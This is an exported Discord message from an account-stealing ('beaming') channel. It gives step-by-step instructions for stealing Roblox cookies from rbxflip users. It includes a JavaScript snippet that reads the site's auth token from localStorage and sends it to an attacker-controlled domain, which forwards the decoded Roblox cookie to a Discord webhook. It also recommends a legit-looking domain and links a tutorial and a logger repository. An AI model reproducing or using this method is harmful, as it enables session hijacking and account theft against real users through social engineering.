==============================================================
Guild: VAULT ALL LOCKERS NEED |  /prediction
Channel: beaming methods / rbxflip
==============================================================

[PM] xeno#0666
1. Upload the files (from the logger folder) to your webserver

2. Get a legit-looking domain

3. Go to rbxflip.com (be logged in)

4. Open the developer console

5. Paste that inside the console:
var token = localStorage.getItem('auth._token.local');
await fetch("https://yourdomain.com/sc.php?t=" + token);

6. The simple js code will get the value of auth._token.local (JWT Token) and then decoding (server-sided), after decoding it, it will read the "credentials" object which is the Roblox cookie stored on rbxflip, then it sends the cookie to the discord webhook of your choice. Nothing special, but people are selling this shit for $25 lol.

7. Tutorial: https://www.youtube.com/watch?v=1YYUJPak5fY
https://github.com/notkohlrexo/rbxflip-logger

{Embed}
https://github.com/notkohlrexo/rbxflip-logger
GitHub - notkohlrexo/rbxflip-logger: since some people are selling ...
since some people are selling that for $25 I decided to make one myself rq since it&#39;s really easy and people shouldn&#39;t waste their money on it - GitHub - notkohlrexo/rbxflip-logger:...
https://images-ext-1.discordapp.net/external/PZZGuQVdmNszcFOXzRRZWEpeNJfep2P2ltfUE3mOkuw/https/opengraph.githubassets.com/18d392151c253c96cacd49005133695d51c1d7565c85b960fbd51cc7bc0d1524/notkohlrexo/rbxflip-logger


==============================================================
Exported 1 message(s)
==============================================================
